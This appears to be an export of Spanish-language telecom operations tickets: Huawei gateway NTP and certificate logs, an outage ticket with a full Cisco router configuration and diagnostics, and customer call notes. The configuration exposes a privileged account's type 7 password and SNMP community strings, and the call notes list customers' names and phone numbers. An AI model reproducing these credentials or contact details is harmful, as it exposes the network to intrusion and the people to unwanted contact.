MAR 21 2018 11:17:52+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[95]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 10:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[96]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 10:27:58+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[97]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 10:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[98]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 10:08:12+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[99]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 09:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[100]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 09:29:35+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[101]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 09:29:35+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[102]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 09:17:55+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[103]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 09:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[104]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 09:07:46+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[105]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 08:57:24+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[106]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 08:57:24+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[107]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4287827997, MODULENAME=PKI, INFOALIAS=LOCAL_VALID)
MAR 21 2018 07:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[108]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 07:04:04+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[109]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 06:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[110]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 05:59:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[111]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 05:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[112]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 05:40:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[113]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 05:21:27+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[114]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 05:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[115]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 04:56:03+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[116]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=9)
MAR 21 2018 04:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[117]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 04:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[118]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 04:08:51+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[119]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=9)
MAR 21 2018 04:08:51+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[120]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 03:43:00+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[121]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 03:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[122]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 03:29:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[123]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 03:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[124]:LAST MESSAGE REPEATED 5 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 02:44:14+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[125]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=9)
MAR 21 2018 02:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[126]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 02:40:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[127]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 02:23:42+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[128]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 02:23:42+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[129]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 02:23:42+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[130]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 02:20:18+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[131]:LAST MESSAGE REPEATED 2 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 02:10:49+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[132]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 02:10:49+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[133]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 02:02:11+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[134]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 02:02:11+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[135]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=3497857038, MODULENAME=NTP, INFOALIAS=PACKET_LENGTH_WRONG)
MAR 21 2018 01:57:56+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[136]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=12)
MAR 21 2018 01:57:56+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01NTP/4/PACKET_LENGTH_WRONG(L)[137]:THE RECEIVED NTP PACKET IS LONGER THAN OR SHORTER THAN A VALID PACKET. (RCVLEN=192)
MAR 21 2018 01:57:56+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[138]:LAST MESSAGE REPEATED 1 TIMES.(INFOID=4287827997, MODULENAME=PKI, INFOALIAS=LOCAL_VALID)
MAR 21 2018 00:41:01+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01PKI/4/LOCAL_VALID(L)[139]:LOCAL CERTIFICATE (/C=CN/O=HUAWEI/OU=SWITCH &amp; ENTERPRISE GATEWAY PRODUCT LINE/CN=21500103652SK6600647.HUAWEI.COM) WILL BE VALID IN 497 DAYS.
MAR 21 2018 00:10:20+00:00 CC_CAMPERO_GT_INTERNET_C170 %%01INFO/4/SUPPRESS_LOG(L)[140</t>
  </si>
  <si>
    <t>F4608316</t>
  </si>
  <si>
    <t xml:space="preserve">SE PROCEDE CON CIERRE POR PROBLEMAS DE NERGIA COMERCIAL 8 MIN UP
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 8 MINUTO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2145213 UPTIME IS 8 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 03:24:30 GMT MON JUN 20 2022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14824P
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
1 VIRTUAL PRIVATE NETWORK (VPN) MODULE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
250880K BYTES OF ATA SYSTEM COMPACTFLASH 0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*0  	  CISCO1941/K9          FTX1614824P
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
-----------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE           TECHNOLOGY-PACKAGE
              CURRENT       TYPE           NEXT REBOOT
------------------------------------------------------------------
IPBASE        IPBASEK9      PERMANENT      IPBASEK9
SECURITY      SECURITYK9    PERMANENT      SECURITYK9
DATA          DATAK9        PERMANENT      DATAK9
CONFIGURATION REGISTER IS 0X2102
IP2145213#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 5839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145213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
NO IPV6 CEF
NO IP SOURCE-ROUTE
NO IP GRATUITOUS-ARPS
IP CEF
!
!
!
!
!
NO IP BOOTP SERVER
IP DOMAIN NAME TELECOM.COM.SV
IP NAME-SERVER 201.247.155.225
IP NAME-SERVER 201.247.157.225
!
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CRYPTO PKI TOKEN DEFAULT REMOVAL TIMEOUT 0
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1545650736
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1545650736
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1545650736
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1545650736
 CERTIFICATE SELF-SIGNED 01
  3082022B 30820194 A0030201 02020101 300D0609 2A864886 F70D0101 05050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31353435 36353037 3336301E 170D3132 30343033 32303134
  34325A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 35343536
  35303733 3630819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100852F A564FCEE 1E466CE0 3717FD3A 8EDF998B 2FFEB713 A18B3DE2 1698E723
  DE55A6A4 7A250C2A 52D09FC0 692534D4 E87FA73E C8E0CA8D A08AB410 5B299ED1
  26EC38DB FEF0372E 93B908E7 1C4E9288 ABE1070B 4658FC41 8AE012EB 83CDAD68
  3D925CC2 B56DF50B 6AF2CA69 41525393 B0923713 08B43C18 7BF4153F 9F9399AC
  1D5B0203 010001A3 53305130 0F060355 1D130101 FF040530 030101FF 301F0603
  551D2304 18301680 14ED93D6 681DA7E6 6CD5D46F AC07967A 54B4C7DB AC301D06
  03551D0E 04160414 ED93D668 1DA7E66C D5D46FAC 07967A54 B4C7DBAC 300D0609
  2A864886 F70D0101 05050003 81810059 1AC4CD57 2465C3B7 8B9F92E7 CF56FE8B
  E40D0D75 FF25924F 1C3AE73A C5511D1D 85FF32A3 BA389767 90A6E1C1 E2AC02FD
  8EB0C3CC B2D98623 FCC61604 39113F6F A95C663A CD12F5C0 A1CAE939 EBF0932C
  2FEC0FCD 1F8A9E29 4FE0D180 42E81544 084BFC2A 303B7E44 25CE31A0 74E2D5C8
  15A08416 81CB9758 9120453A AE043B
  	QUIT
LICENSE UDI PID CISCO1941/K9 SN FTX1614824P
!
!
USERNAME T3LN0CR3D3S PRIVILEGE 15 PASSWORD 7 111D4A091942085E547A73
!
REDUNDANCY
!
!
!
!
IP TCP SYNWAIT-TIME 10
!
CLASS-MAP MATCH-ALL SERVICES_384K
 MATCH ANY
!
!
POLICY-MAP SERVICIOS_384K
 CLASS SERVICES_384K
  POLICE CIR 384000 BC 72000 BE 1440000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.166.1.5 255.255.255.255
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/IP2145213SV/_/
 BANDWIDTH 3072
 IP ADDRESS 10.154.40.90 255.255.255.248
 IP OSPF NETWORK NON-BROADCAST
 IP OSPF PRIORITY 0
 IP OSPF MTU-IGNORE
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 22.96.0.54 255.255.255.252
 RATE-LIMIT INPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 3072000 576000 1152000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 LOAD-INTERVAL 30
 DUPLEX FULL
 SPEED 100
!
ROUTER OSPF 160
 REDISTRIBUTE CONNECTED SUBNETS
 REDISTRIBUTE STATIC SUBNETS
 REDISTRIBUTE OSPF 1 SUBNETS
 NETWORK 10.154.40.88 0.0.0.7 AREA 0
 NEIGHBOR 10.154.40.89 PRIORITY 254
!
ROUTER OSPF 1
 REDISTRIBUTE OSPF 160 SUBNETS
 NETWORK 22.96.0.52 0.0.0.3 AREA 0
 DEFAULT-INFORMATION ORIGINATE
 DISTANCE 100
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
IP HTTP ACCESS-CLASS 23
IP HTTP AUTHENTICATION LOCAL
IP HTTP SECURE-SERVER
IP HTTP TIMEOUT-POLICY IDLE 60 LIFE 86400 REQUESTS 10000
!
!
LOGGING SOURCE-INTERFACE LOOPBACK5
ACCESS-LIST 23 PERMIT 10.10.10.0 0.0.0.7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
!
!
SNMP-SERVER COMMUNITY ESCW2KPU RO 97
SNMP-SERVER COMMUNITY MON000089D RO
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5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ACCESS-CLASS 98 IN
 TRANSPORT INPUT TELNET SSH
LINE VTY 5 15
 ACCESS-CLASS 98 IN
 PRIVILEGE LEVEL 15
 TRANSPORT INPUT TELNET SSH
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER 201.247.152.233 PREFER
NTP SERVER 201.247.152.249
END
IP2145213#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28 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 32 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (4096 BYTES):
JAN  2 12:00:02.683: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = IPBASEK9 AND LICENSE = IPBASEK9
JAN  2 12:00:02.839: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = SECURITYK9 AND LICENSE = SECURITYK9
JAN  2 12:00:02.995: %IOS_LICENSE_IMAGE_APPLICATION-6-LICENSE_LEVEL: MODULE NAME = C1900 NEXT REBOOT LEVEL = DATAK9 AND LICENSE = DATAK9
JUN 20 09:24:53.247: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
JUN 20 09:24:53.251: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
JUN 20 09:24:54.087: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 20 09:24:54.087: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 20 09:24:55.187: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO DOWN
JUN 20 09:24:55.187: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO DOWN
JUN 20 03:24:56.443 GMT: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 09:24:56 UTC MON JUN 20 2022 TO 03:24:56 GMT MON JUN 20 2022, CONFIGURED FROM CONSOLE BY CONSOLE.
JUN 20 03:24:56.743 GMT: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
JUN 20 03:24:57.783 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
JUN 20 03:24:58.595 GMT: %LINK-5-CHANGED: INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO ADMINISTRATIVELY DOWN
JUN 20 03:24:59.607 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 20 03:24:59.607 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE EMBEDDED-SERVICE-ENGINE0/0, CHANGED STATE TO DOWN
JUN 20 03:25:00.303 GMT: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C1900 SOFTWARE (C1900-UNIVERSALK9-M), VERSION 15.1(4)M3, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2011 BY CISCO SYSTEMS, INC.
COMPILED TUE 06-DEC-11 16:02 BY PROD_REL_TEAM
JUN 20 03:25:00.303 GMT: %SNMP-5-COLDSTART: SNMP AGENT ON HOST IP2145213 IS UNDERGOING A COLD START
JUN 20 03:25:00.923 GMT: %SSH-5-ENABLED: SSH 1.99 HAS BEEN ENABLED
JUN 20 03:25:00.923 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/0, CHANGED STATE TO UP
JUN 20 03:25:00.931 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 20 03:25:00.931 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 20 03:25:00.931 GMT: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
JUN 20 03:25:00.931 GMT: %CRYPTO-6-GDOI_ON_OFF: GDOI IS OFF
JUN 20 03:25:15.095 GMT: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 20 03:25:16.095 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0/1, CHANGED STATE TO UP
JUN 20 03:26:23.543 GMT: %OSPF-5-ADJCHG: PROCESS 1, NBR 22.96.119.67 ON GIGABITETHERNET0/1 FROM LOADING TO FULL, LOADING DONE
JUN 20 03:27:24.759 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.40.89 ON GIGABITETHERNET0/0 FROM INIT TO DOWN, NEIGHBOR DOWN: DEAD TIMER EXPIRED
JUN 20 03:27:27.031 GMT: %OSPF-5-ADJCHG: PROCESS 160, NBR 10.154.40.89 ON GIGABITETHERNET0/0 FROM LOADING TO FULL, LOADING DONE
IP2145213#
SHOW CLOCK
03:32:51.579 GMT MON JUN 20 2022
IP2145213#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.154.40.89            7   183D.5E15.B600  ARPA   GIGABITETHERNET0/0
INTERNET  10.154.40.90            -   442B.0368.C900  ARPA   GIGABITETHERNET0/0
INTERNET  22.96.0.53              6   CCEF.48A9.D700  ARPA   GIGABITETHERNET0/1
INTERNET  22.96.0.54              -   442B.0368.C901  ARPA   GIGABITETHERNET0/1
IP2145213#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN
GI0/0                          UP             UP       WAN PRINCIPAL/_/IP2145213SV/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
IP2145213#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.154.40.90    YES NVRAM  UP                    UP
GIGABITETHERNET0/1         22.96.0.54      YES NVRAM  UP                    UP
LOOPBACK5                  10.166.1.5      YES NVRAM  UP                    UP
IP2145213#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN WALMART 10.154.40.90
  PING 10.154.40.90: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.154.40.90 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.30.93
DISPLAY IP ROUTING-TABLE VPN-INSTANCE WALMART 10.154.40.90
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : WALMART
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.154.40.90/32  DIRECT  0    0                 0.0.0.0         VLANIF1760			</t>
  </si>
  <si>
    <t>F4608422</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DORA VILLALOBOS AL 25919046 INDICA QUE AUN PERSISTE EL INCONVENIENTE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001120222
**</t>
  </si>
  <si>
    <t>F4608429</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR PERALTA 46153837 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001121681
**</t>
  </si>
  <si>
    <t>F4608438</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BYRON GOMEZ AL 77401515 BRINDA LOS SIGUIENTES DATOS PARA LA VISITA TECNICA E INDICA QUE ESTARA CONFIRMANDO LA DIRECCION CUANDO CONFIRME ACCESOS YA QUE NO LA TIENE **
HORARIO DE ATENCION: 7:00 A 17:00 HRS
GESTION DE PERMISOS:  SE NECESITAN  PERMISOS ENVIAR CORREO CON EL LISTADO DEL PERSONAL AL CORREO BGOMEZ@LAUNION.COM.GT.
ATENDERA EN SITIO: MALDOQUEO ESQUIVELID 1001109882
**</t>
  </si>
  <si>
    <t>F4608455</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KENSEL RIVERA  54146395 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001123060</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN INGRESA LA LLAMADA,
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4608468</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. PAHOLA CASTRO +504 94773121 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 1001126809
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SRTA. PAHOLA CASTRO +504 94773121 NO CONTESTO IVR ENVIA A BUZON, ID: 1001124368.</t>
  </si>
  <si>
    <t>F4608477</t>
  </si>
  <si>
    <t>SE LLAMA A PR  SILVIO TORREZ 57647759 NO RESPONDE, ENVIA A BUZON SE INTENTARA LUEGO PARA SOLICITAR
 DATOS DE VISITA **
-ID 1001127797
**</t>
  </si>
  <si>
    <t>F4608480</t>
  </si>
  <si>
    <t>SE LLAMMA A CLIENTE YESI-42735681  ##NO OCNTESTA ##ENVIA A BUZON ##
1001131215
COLA:
NOMBRE: A: 42735681
NÚMERO: 42735681
DURACIÓN: 0:00:32
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 42735681
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/06/2022 09:07:20
1001131359
COLA:
NOMBRE: A: 42735681
